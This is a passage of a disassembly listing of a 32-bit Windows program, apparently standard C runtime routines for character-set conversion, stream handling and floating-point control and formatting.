add eax, 3
and al, 0FCh
call sub_41C500
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_41BF70
add esp, 0Ch
jmp short loc_4245F8
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4245F8: ; CODE XREF: sub_4244F4+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_424629
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4270E8 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_424629
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_427014 ; GetStringTypeW
jmp short loc_42462B
; ---------------------------------------------------------------------------
loc_424629: ; CODE XREF: sub_4244F4+61�j
; sub_4244F4+9B�j ...
xor eax, eax
loc_42462B: ; CODE XREF: sub_4244F4+93�j
; sub_4244F4+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4244F4 endp
; =============== S U B R O U T I N E =======================================
sub_42463D proc near ; CODE XREF: sub_41FE2A+61�p
; sub_420CE6+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_4DD140
jb short loc_42464C
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42464C: ; CODE XREF: sub_42463D+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_4DD040[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_42463D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424663 proc near ; CODE XREF: sub_41FF3F+2D4�p
; sub_41FF3F+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_42466F
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42466F: ; CODE XREF: sub_424663+8�j
cmp dword_4DBE84, 0
jnz short loc_42468A
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_4246BC
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42468A: ; CODE XREF: sub_424663+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_43D084
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_4DBE94
call ds:dword_427188 ; WideCharToMultiByte
test eax, eax
jz short loc_4246BC
cmp [ebp+arg_0], 0
jz short loc_4246C9
loc_4246BC: ; CODE XREF: sub_424663+1E�j
; sub_424663+51�j
mov dword_4DBDDC, 2Ah
or eax, 0FFFFFFFFh
loc_4246C9: ; CODE XREF: sub_424663+57�j
pop ebp
retn
sub_424663 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4246CB proc near ; CODE XREF: sub_420DB0+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_4246EE
cmp [ebp+arg_8], ebx
jz short loc_4246EE
mov al, [esi]
cmp al, bl
jnz short loc_4246F4
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4246EE
mov [eax], bx
loc_4246EE: ; CODE XREF: sub_4246CB+C�j
; sub_4246CB+11�j ...
xor eax, eax
loc_4246F0: ; CODE XREF: sub_4246CB+42�j
; sub_4246CB+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4246F4: ; CODE XREF: sub_4246CB+17�j
cmp dword_4DBE84, ebx
jnz short loc_42470F
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_42470A
movzx ax, al
mov [ecx], ax
loc_42470A: ; CODE XREF: sub_4246CB+36�j
; sub_4246CB+C0�j
push 1
pop eax
jmp short loc_4246F0
; ---------------------------------------------------------------------------
loc_42470F: ; CODE XREF: sub_4246CB+2F�j
mov ecx, off_43CE78
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42476C
mov eax, dword_43D084
cmp eax, 1
jle short loc_424753
cmp [ebp+arg_8], eax
jl short loc_42475D
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_4DBE94
call ds:dword_4270E8 ; MultiByteToWideChar
test eax, eax
mov eax, dword_43D084
jnz short loc_4246F0
loc_424753: ; CODE XREF: sub_4246CB+5C�j
cmp [ebp+arg_8], eax
jb short loc_42475D
cmp [esi+1], bl
jnz short loc_4246F0
loc_42475D: ; CODE XREF: sub_4246CB+61�j
; sub_4246CB+8B�j ...
mov dword_4DBDDC, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4246F0
; ---------------------------------------------------------------------------
loc_42476C: ; CODE XREF: sub_4246CB+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_4DBE94
call ds:dword_4270E8 ; MultiByteToWideChar
test eax, eax
jnz loc_42470A
jmp short loc_42475D
sub_4246CB endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4247A0 proc near ; CODE XREF: sub_420DB0+797�p
; sub_420DB0+7E7�p
cmp cl, 40h
jnb short loc_4247BA
cmp cl, 20h
jnb short loc_4247B0
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
loc_4247B0: ; CODE XREF: sub_4247A0+8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_4247BA: ; CODE XREF: sub_4247A0+3�j
xor eax, eax
xor edx, edx
retn
sub_4247A0 endp
; =============== S U B R O U T I N E =======================================
sub_4247BF proc near ; CODE XREF: sub_421826+F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
cmp ebx, 0FFFFFFFFh
push esi
jz short loc_42480B
mov esi, [esp+8+arg_4]
mov eax, [esi+0Ch]
test al, 1
jnz short loc_4247DD
test al, 80h
jz short loc_42480B
test al, 2
jnz short loc_42480B
loc_4247DD: ; CODE XREF: sub_4247BF+14�j
cmp dword ptr [esi+8], 0
jnz short loc_4247EA
push esi
call sub_4241F7
pop ecx
loc_4247EA: ; CODE XREF: sub_4247BF+22�j
mov eax, [esi]
cmp eax, [esi+8]
jnz short loc_4247FA
cmp dword ptr [esi+4], 0
jnz short loc_42480B
inc eax
mov [esi], eax
loc_4247FA: ; CODE XREF: sub_4247BF+30�j
test byte ptr [esi+0Ch], 40h
jz short loc_424811
dec dword ptr [esi]
mov eax, [esi]
cmp [eax], bl
jz short loc_424817
inc eax
mov [esi], eax
loc_42480B: ; CODE XREF: sub_4247BF+9�j
; sub_4247BF+18�j ...
or eax, 0FFFFFFFFh
loc_42480E: ; CODE XREF: sub_4247BF+6C�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_424811: ; CODE XREF: sub_4247BF+3F�j
dec dword ptr [esi]
mov eax, [esi]
mov [eax], bl
loc_424817: ; CODE XREF: sub_4247BF+47�j
mov eax, [esi+0Ch]
inc dword ptr [esi+4]
and al, 0EFh
or al, 1
mov [esi+0Ch], eax
mov eax, ebx
and eax, 0FFh
jmp short loc_42480E
sub_4247BF endp
; =============== S U B R O U T I N E =======================================
sub_42482D proc near ; CODE XREF: sub_421E16+52�p
xor eax, eax
retn
sub_42482D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424830 proc near ; CODE XREF: sub_424865+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_42487B
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_42490D
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_424830 endp
; =============== S U B R O U T I N E =======================================
sub_424865 proc near ; CODE XREF: sub_422102+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_424830
pop ecx
pop ecx
retn
sub_424865 endp
; =============== S U B R O U T I N E =======================================
sub_42487B proc near ; CODE XREF: sub_424830+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_42488C
push 10h
pop eax
loc_42488C: ; CODE XREF: sub_42487B+C�j
test bl, 4
jz short loc_424893
or al, 8
loc_424893: ; CODE XREF: sub_42487B+14�j
test bl, 8
jz short loc_42489A
or al, 4
loc_42489A: ; CODE XREF: sub_42487B+1B�j
test bl, 10h
jz short loc_4248A1
or al, 2
loc_4248A1: ; CODE XREF: sub_42487B+22�j
test bl, 20h
jz short loc_4248A8
or al, 1
loc_4248A8: ; CODE XREF: sub_42487B+29�j
test bl, 2
jz short loc_4248B2
or eax, 80000h
loc_4248B2: ; CODE XREF: sub_42487B+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_4248EA
cmp edx, 400h
jz short loc_4248E7
cmp edx, 800h
jz short loc_4248E3
cmp edx, esi
jnz short loc_4248EA
or eax, edi
jmp short loc_4248EA
; ---------------------------------------------------------------------------
loc_4248E3: ; CODE XREF: sub_42487B+5E�j
or eax, ebp
jmp short loc_4248EA
; ---------------------------------------------------------------------------
loc_4248E7: ; CODE XREF: sub_42487B+56�j
or ah, 1
loc_4248EA: ; CODE XREF: sub_42487B+4E�j
; sub_42487B+62�j ...
and ecx, edi
pop esi
jz short loc_4248FA
cmp ecx, ebp
jnz short loc_4248FF
or eax, 10000h
jmp short loc_4248FF
; ---------------------------------------------------------------------------
loc_4248FA: ; CODE XREF: sub_42487B+72�j
or eax, 20000h
loc_4248FF: ; CODE XREF: sub_42487B+76�j
; sub_42487B+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_42490C
or eax, 40000h
locret_42490C: ; CODE XREF: sub_42487B+8A�j
retn
sub_42487B endp
; =============== S U B R O U T I N E =======================================
sub_42490D proc near ; CODE XREF: sub_424830+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_42491D
push 1
pop eax
loc_42491D: ; CODE XREF: sub_42490D+B�j
test bl, 8
jz short loc_424924
or al, 4
loc_424924: ; CODE XREF: sub_42490D+13�j
test bl, 4
jz short loc_42492B
or al, 8
loc_42492B: ; CODE XREF: sub_42490D+1A�j
test bl, 2
jz short loc_424932
or al, 10h
loc_424932: ; CODE XREF: sub_42490D+21�j
test bl, 1
jz short loc_424939
or al, 20h
loc_424939: ; CODE XREF: sub_42490D+28�j
test ebx, 80000h
jz short loc_424943
or al, 2
loc_424943: ; CODE XREF: sub_42490D+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_424970
cmp ecx, 100h
jz short loc_42496D
cmp ecx, esi
jz short loc_424968
cmp ecx, edx
jnz short loc_424970
or ah, 0Ch
jmp short loc_424970
; ---------------------------------------------------------------------------
loc_424968: ; CODE XREF: sub_42490D+50�j
or ah, 8
jmp short loc_424970
; ---------------------------------------------------------------------------
loc_42496D: ; CODE XREF: sub_42490D+4C�j
or ah, 4
loc_424970: ; CODE XREF: sub_42490D+44�j
; sub_42490D+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_424986
cmp ecx, 10000h
jnz short loc_424988
or eax, esi
jmp short loc_424988
; ---------------------------------------------------------------------------
loc_424986: ; CODE XREF: sub_42490D+6B�j
or eax, edx
loc_424988: ; CODE XREF: sub_42490D+73�j
; sub_42490D+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_424995
or ah, 10h
locret_424995: ; CODE XREF: sub_42490D+83�j
retn
sub_42490D endp
; =============== S U B R O U T I N E =======================================
sub_424996 proc near ; CODE XREF: sub_424A35+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_4249DB
inc esi
cmp esi, 3
jge short loc_4249D6
lea eax, [eax+esi*4]
loc_4249C8: ; CODE XREF: sub_424996+3E�j
cmp dword ptr [eax], 0
jnz short loc_4249DB
inc esi
add eax, 4
cmp esi, 3
jl short loc_4249C8
loc_4249D6: ; CODE XREF: sub_424996+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4249DB: ; CODE XREF: sub_424996+27�j
; sub_424996+35�j
xor eax, eax
pop esi
retn
sub_424996 endp
; =============== S U B R O U T I N E =======================================
sub_4249DF proc near ; CODE XREF: sub_424A35+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_425301
add esp, 0Ch
dec esi
js short loc_424A31
lea edi, [ebx+esi*4]
loc_424A18: ; CODE XREF: sub_4249DF+50�j
test eax, eax
jz short loc_424A31
push edi
push 1
push dword ptr [edi]
call sub_425301
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_424A18
loc_424A31: ; CODE XREF: sub_4249DF+34�j
; sub_4249DF+3B�j
pop edi
pop esi
pop ebx
retn
sub_4249DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424A35 proc near ; CODE XREF: sub_424B90+81�p
; sub_424B90+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_424A99
inc ebx
push ebx
push [ebp+arg_0]
call sub_424996
pop ecx
test eax, eax
pop ecx
jnz short loc_424A96
push edi
push [ebp+arg_0]
call sub_4249DF
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_424A96: ; CODE XREF: sub_424A35+51�j
mov eax, [ebp+arg_4]
loc_424A99: ; CODE XREF: sub_424A35+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_424AB9
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_424AB9: ; CODE XREF: sub_424A35+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_424A35 endp
; =============== S U B R O U T I N E =======================================
sub_424AC1 proc near ; CODE XREF: sub_424B90+75�p
; sub_424B90+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_424ACF: ; CODE XREF: sub_424AC1+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_424ACF
pop esi
retn
sub_424AC1 endp
; =============== S U B R O U T I N E =======================================
sub_424ADC proc near ; CODE XREF: sub_424B90+5F�p
; sub_424B90+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_424ADC endp
; =============== S U B R O U T I N E =======================================
sub_424AE8 proc near ; CODE XREF: sub_424B90+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_424AEE: ; CODE XREF: sub_424AE8+12�j
cmp dword ptr [eax], 0
jnz short loc_424B00
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_424AEE
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_424B00: ; CODE XREF: sub_424AE8+9�j
xor eax, eax
retn
sub_424AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B03 proc near ; CODE XREF: sub_424B90+C0�p
; sub_424B90+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_424B39: ; CODE XREF: sub_424B03+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_424B39
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_424B6B: ; CODE XREF: sub_424B03+86�j
cmp ebx, edi
jl short loc_424B7E
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_424B85
; ---------------------------------------------------------------------------
loc_424B7E: ; CODE XREF: sub_424B03+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_424B85: ; CODE XREF: sub_424B03+79�j
dec ebx
sub ecx, 4
jns short loc_424B6B
pop edi
pop esi
pop ebx
leave
retn
sub_424B03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B90 proc near ; CODE XREF: sub_424CFC+D�p
; sub_424D12+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_424BFD
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_424AE8
test eax, eax
pop ecx
jnz loc_424CBC
lea eax, [ebp+var_C]
push eax
call sub_424ADC
pop ecx
loc_424BF5: ; CODE XREF: sub_424B90+E4�j
push 2
loc_424BF7: ; CODE XREF: sub_424B90+110�j
pop eax
jmp loc_424CBE
; ---------------------------------------------------------------------------
loc_424BFD: ; CODE XREF: sub_424B90+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_424AC1
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_424A35
add esp, 10h
test eax, eax
jz short loc_424C1E
inc ebx
loc_424C1E: ; CODE XREF: sub_424B90+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_424C36
lea eax, [ebp+var_C]
push eax
call sub_424ADC
pop ecx
jmp short loc_424C72
; ---------------------------------------------------------------------------
loc_424C36: ; CODE XREF: sub_424B90+98�j
cmp ebx, eax
jg short loc_424C79
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_424AC1
lea eax, [ebp+var_C]
push esi
push eax
call sub_424B03
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_424A35
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_424B03
add esp, 20h
loc_424C72: ; CODE XREF: sub_424B90+A4�j
xor esi, esi
jmp loc_424BF5
; ---------------------------------------------------------------------------
loc_424C79: ; CODE XREF: sub_424B90+A8�j
cmp ebx, [edi]
jl short loc_424CA5
lea eax, [ebp+var_C]
push eax
call sub_424ADC
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_424B03
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_424BF7
; ---------------------------------------------------------------------------
loc_424CA5: ; CODE XREF: sub_424B90+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_424B03
pop ecx
pop ecx
loc_424CBC: ; CODE XREF: sub_424B90+55�j
xor eax, eax
loc_424CBE: ; CODE XREF: sub_424B90+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_424CED
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_424CF7
; ---------------------------------------------------------------------------
loc_424CED: ; CODE XREF: sub_424B90+14E�j
cmp edi, 20h
jnz short loc_424CF7
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_424CF7: ; CODE XREF: sub_424B90+15B�j
; sub_424B90+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_424B90 endp
; =============== S U B R O U T I N E =======================================
sub_424CFC proc near ; CODE XREF: sub_424D28+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D7F8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_424B90
add esp, 0Ch
retn
sub_424CFC endp
; =============== S U B R O U T I N E =======================================
sub_424D12 proc near ; CODE XREF: sub_424D55+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43D810
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_424B90
add esp, 0Ch
retn
sub_424D12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D28 proc near ; CODE XREF: sub_42223B+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4254A2
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_424CFC
add esp, 24h
leave
retn
sub_424D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D55 proc near ; CODE XREF: sub_42223B+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_4254A2
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_424D12
add esp, 24h
leave
retn
sub_424D55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424D82 proc near ; CODE XREF: sub_422279+65�p
; sub_42237D+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_424DBF
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_424DA5: ; CODE XREF: sub_424D82+38�j
mov dl, [ecx]
test dl, dl
jz short loc_424DB1
movsx edx, dl
inc ecx
jmp short loc_424DB4
; ---------------------------------------------------------------------------
loc_424DB1: ; CODE XREF: sub_424D82+27�j
push 30h
pop edx
loc_424DB4: ; CODE XREF: sub_424D82+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_424DA5
mov edx, [ebp+arg_8]
loc_424DBF: ; CODE XREF: sub_424D82+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_424DD8
cmp byte ptr [ecx], 35h
jl short loc_424DD8
loc_424DCB: ; CODE XREF: sub_424D82+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_424DD6
mov byte ptr [eax], 30h
jmp short loc_424DCB
; ---------------------------------------------------------------------------
loc_424DD6: ; CODE XREF: sub_424D82+4D�j
inc byte ptr [eax]
loc_424DD8: ; CODE XREF: sub_424D82+42�j
; sub_424D82+47�j
cmp byte ptr [esi], 31h
jnz short loc_424DE2
inc dword ptr [edx+4]
jmp short loc_424DF4
; ---------------------------------------------------------------------------
loc_424DE2: ; CODE XREF: sub_424D82+59�j
push edi
call sub_41B9C0
inc eax
push eax
push edi
push esi
call sub_41D670
add esp, 10h
loc_424DF4: ; CODE XREF: sub_424D82+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_424D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424DF9 proc near ; CODE XREF: sub_422279+3F�p
; sub_42237D+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_424E5D
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_4DBFB8
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_425973
mov dword_4DBFE0, eax
add esp, 18h
movsx eax, byte_4DBFBA
mov dword_4DBFD8, eax
pop edi
movsx eax, word_4DBFB8
mov dword_4DBFDC, eax
mov dword_4DBFE4, offset dword_4DBFBC
mov eax, offset dword_4DBFD8
pop esi
leave
retn
sub_424DF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424E5D proc near ; CODE XREF: sub_424DF9+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_424EAB
cmp ebx, edi
jz short loc_424EA4
lea edi, [ecx+3C00h]
jmp short loc_424ECC
; ---------------------------------------------------------------------------
loc_424EA4: ; CODE XREF: sub_424E5D+3D�j
mov edi, 7FFFh
jmp short loc_424ECC
; ---------------------------------------------------------------------------
loc_424EAB: ; CODE XREF: sub_424E5D+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_424EC3
cmp edx, ebx
jnz short loc_424EC3
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_424F0E
; ---------------------------------------------------------------------------
loc_424EC3: ; CODE XREF: sub_424E5D+52�j
; sub_424E5D+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_424ECC: ; CODE XREF: sub_424E5D+45�j
; sub_424E5D+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_424EE4: ; CODE XREF: sub_424E5D+A6�j
test ecx, esi
jnz short loc_424F05
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_424EE4
; ---------------------------------------------------------------------------
loc_424F05: ; CODE XREF: sub_424E5D+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_424F0E: ; CODE XREF: sub_424E5D+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_424E5D endp
; ---------------------------------------------------------------------------
push 2
